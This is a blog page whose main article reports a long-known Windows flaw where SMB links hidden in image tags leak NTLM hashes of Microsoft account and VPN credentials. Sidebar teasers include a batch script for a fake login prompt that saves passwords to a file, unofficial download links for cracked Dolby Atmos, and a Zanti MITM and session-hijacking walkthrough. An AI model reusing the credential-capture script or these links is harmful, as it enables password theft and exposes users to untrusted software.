Skip to main content

Windows flaw


Microsoft Account Passwords, VPN Credentials Leaked Due To Windows Flaw

 
All Windows versions have a flaw that leak Microsoft account passwords and VPN credentials

If a Microsoft user is using a VPN (virtual private network) to browse the Internet, there are chances that the user’s Microsoft account username and password or VPN credentials could be leaked. The reason behind this is assumed to be the error by Windows in handling its old validation procedures for shared network resources.

The exploit depends on an attacker inserting a link to an SMB resource (network share) inside an email or a Web page that gets noticed via Outlook.

Inside the image tags, the attacker can camouflage the link to his network share. Further, they can put the link to a network share hosted on his own network instead of the proper image link.

When a user tries to use the link via Internet Explorer, Edge, or Outlook, their computer even via the Internet will automatically send their login credentials to validate on the criminal’s domain. The reason is due to the way Windows manages authentication for network shares.

Even though Microsoft account password is not leaked in cleartext, researchers demonstrated a long time ago that as an NTLM hash, these could be easily cracked.

This isn’t even something new, since Microsoft and the researcher community have known about this issue since 1997 and often discussed it at security conferences such as black hat.

This was not an issue in the past, as Windows accounts were using machine-localized usernames and password. However, Microsoft started to allow users to validate on their computers with Microsoft accounts after it introduced Windows 8 and upwards. By the time, Windows 10 was out; this became the de-facto standard validation method implying that it was used by more users.

Microsoft has begun to associate all its online realities with the user’s same Microsoft account in the recent years. This old attack now allows a crook to access credentials for Microsoft accounts, which in turn will also grant them indirect entry to all kinds of services like Skype, OneDrive, Xbox, Bing, MSN, Office 360, Azure, and more, says ValdikSS from Prosto VPN.

To make things worse, the user’s VPN credentials get leaked if the user is making use of a VPN connection to load the fraudulent SMB resource. This allows the crook to access the victim’s VPN account.

“Microsoft successfully fixed some issues, some other issues were half-fixed, and another ones are not fixed at all and could be exploited up to this day,” ValdikSS explains. “The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones.”

One can simply protect themselves against such attacks is by obstructing all outgoing SMB connections (port 445) via the Windows firewall, except for local networks, ValdikSS says. However, the best solution against such attack would be to not use your Microsoft account to log into your Windows PC.

Comments

Post a Comment

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the
Post a Comment
Read more

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment
3 comments
Read more

use zantu on android

Zanti 2 is a android application which is made up for network penetration testing. What Zanti 2 can do? Scan the whole network show alive host in the network scan port through Nmap for port Scanning Scan Service on each port and find vulnerability. Perform Brute force Attack Perform Shell Shock etc Vulnerability MITM : Man In The Middle Attack Session Hijackings SSL Striping Sniffing Packets Replace Image Redirect URL and IP Intercept and modified live download. Disclaimer –  I recommend that you test this tutorial on a system that belongs to YOU.   For Demonstration : Before  install Zanti your Phone must be rooted  .. In case your phone is not rooted search in the site you will find how to root android its very easy. I used Zanti in my android device and Scan the network. I choose the Mac OSx Machine which was my laptop. After that start The MITM on and SSL strip to grab some packets and try to grab the password of that machine. in the end i successfully travel the
Post a Comment
Read more